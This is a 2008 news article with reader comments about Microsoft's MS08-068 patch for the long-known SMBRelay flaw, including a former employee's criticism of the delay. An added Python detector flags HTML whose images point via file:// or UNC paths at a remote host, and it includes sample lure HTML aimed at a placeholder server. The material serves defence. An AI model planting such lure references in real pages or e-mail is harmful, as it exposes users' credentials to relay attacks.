A former Microsoft employee who's now CTO for a patch management firm says an update issued by Microsoft on Tuesday closes a vulnerability that has been exploited for almost seven years and that he first identified while working for the company.
Eric Schultze, who served as a founding member of the Trustworthy Computing team at Microsoft and was a security director for the vendor, says the MS08-068 patch that Microsoft released as part of its monthly Patch Tuesday announcement closes a flaw he first tested at Microsoft in 2001.
“It is important to get this one patched right away because exploit tools are readily available,” says Schultze, even though the patch is rated “important” and not “critical.”
“Back in 2001 there was an exploit tool released called SMBRelay and a gentleman by the name of Sir Dystic wrote it,” says Schultze, CTO for Shavlik Technologies. “I was at Microsoft and I tested it and said ‘holy crap, this works.’ I addressed it with Microsoft but they buried their head in the sand. But it looks like they may have finally fixed it.”
On Tuesday, Schultze again tested the flaw and confirmed that the “MS08-068 patch does address the SMBRelay attack” written by hacker Sir Dystic, of Cult of the Dead Cow, in March 2001.
He chided Microsoft for leaving the hole open for so long on so many versions of the operating system.
“This means that Microsoft has known of this problem since 2001 and was not able to (or chose not to) fix it until now,” Schultze wrote in an e-mail follow-up to an earlier interview. “This also means that working exploit code has been available for all operating systems including Windows NT 4, Windows 2000, XP, Windows Server 2003, Vista and Windows Server 2008.” He goes on to say, “though as Microsoft correctly states, exploitation is severely mitigated on Vista and Windows Server 2008.”
Schultze acknowledges that the Server Message Block (SMB) flaw addressed in MS08-068 has become less of a threat since companies began to fine-tune their firewalls. But the vulnerability, which could allow an attacker to take over a user’s hard drive, is still a threat within a company’s firewalls, he says.
One operating system that the vulnerability affects is Windows XP SP2, which is still widely used on corporate networks.
Key to exploiting the vulnerability is that the attacker’s machine and the target machine are both running NetBIOS, which lets applications on different computers communicate over a LAN and today is usually blocked at the corporate firewall. The machines also need the Windows Server service running; it is turned on by default in XP and other Windows versions, but is off by default in Vista and Windows Server 2008.
The attacker could send an HTML e-mail or direct the victim to a Web site; either would carry a specially formed Web page whose source code references a small image file. Rather than pointing at a real image, that reference would use a file:// URL aimed at a malicious server. The file:// scheme is handled by the base operating system as a NetBIOS-like file-access command.
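The lure described above, a page or HTML e-mail whose image reference points at a file:// or UNC location on a remote host, is something a mail gateway or Web proxy can flag before a client renders it and attempts the SMB connection. The following Python is an added example, not code from the article: it scans HTML for automatically fetched references to remote file:// or UNC hosts; the sample HTML and the RELAY-HOST-PLACEHOLDER name are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attributes a browser or mail client fetches automatically while rendering.
AUTO_FETCH_ATTRS = {"src", "background"}


def _unc_host(path):
    # file:////server/share/x.gif parses with an empty netloc and path //server/share/x.gif
    return path.lstrip("/").split("/", 1)[0] if path.startswith("//") else ""


class RemoteFileRefFinder(HTMLParser):
    """Collects auto-fetched references whose target is a remote host via file:// or a UNC path."""

    def __init__(self):
        super().__init__()
        self.hits = []  # (tag, host, original reference)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in AUTO_FETCH_ATTRS and value:
                self._check(tag, value.strip())

    def _check(self, tag, value):
        host = ""
        if value.startswith("\\\\"):        # raw UNC path: \\server\share\x.gif
            host = value[2:].split("\\", 1)[0]
        else:
            parsed = urlparse(value)
            if parsed.scheme == "file":     # file://server/... or file:////server/...
                host = parsed.netloc or _unc_host(parsed.path)
        if host:  # file:///C:/local.gif has no host component and is left alone
            self.hits.append((tag, host, value))


def find_remote_file_refs(html):
    """Return [(tag, host, reference)] for every auto-fetched file:// or UNC reference in html."""
    finder = RemoteFileRefFinder()
    finder.feed(html)
    finder.close()
    return finder.hits


# Constructed sample: a lure page of the kind the article describes, mixed with benign references.
SAMPLE_HTML = """<html><body><p>Quarterly report</p>
<img src="https://example.invalid/logo.png">
<img src="file:///C:/Windows/Web/Wallpaper/img1.jpg">
<img src="file://RELAY-HOST-PLACEHOLDER/share/x.gif" width="1" height="1">
<img src="\\\\RELAY-HOST-PLACEHOLDER\\pics\\y.gif">
</body></html>"""
```

Running `find_remote_file_refs(SAMPLE_HTML)` returns only the two references that would make the client reach out to RELAY-HOST-PLACEHOLDER; the HTTPS image and the local file:///C: path are ignored.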
Comments (6)
No surprise
By Schratboy on November 12, 2008, 10:13 am
The dreaded "unknown vulnerability!" They exist in all applications...BIG DEAL! Threats, misuse and poor policy enforcement are worse problems and eminently more...
Screenshot
By Anonymous on November 12, 2008, 3:03 pm
Screenshot of failed patch install. Be careful when installing it. http://www.flickr.com/photos/32216121@N04/3012791497/
"Back in 2001, however, people didn’t know to block NetBios at t
By rhino777 on November 13, 2008, 2:38 pm
"Back in 2001, however, people didn’t know to block NetBios at the firewall." Who were these people?
it was known - that's the whole point
By Anonymous on November 13, 2008, 3:00 pm
Uh, did you read this? The whole point is they DID know about this - and decided not to fix it. THAT is what makes the difference between "oops" and actionable...
Who were they?
By Anonymous on November 13, 2008, 4:01 pm
The same folks that got nailed by Code Red.
Who were these "people"?
By tuomoks on November 14, 2008, 7:07 pm
A good comment! I also would like to know who they were / are (excluding home users, of course) - seriously, over 15 years of unsafe networking (NetBios) and still some...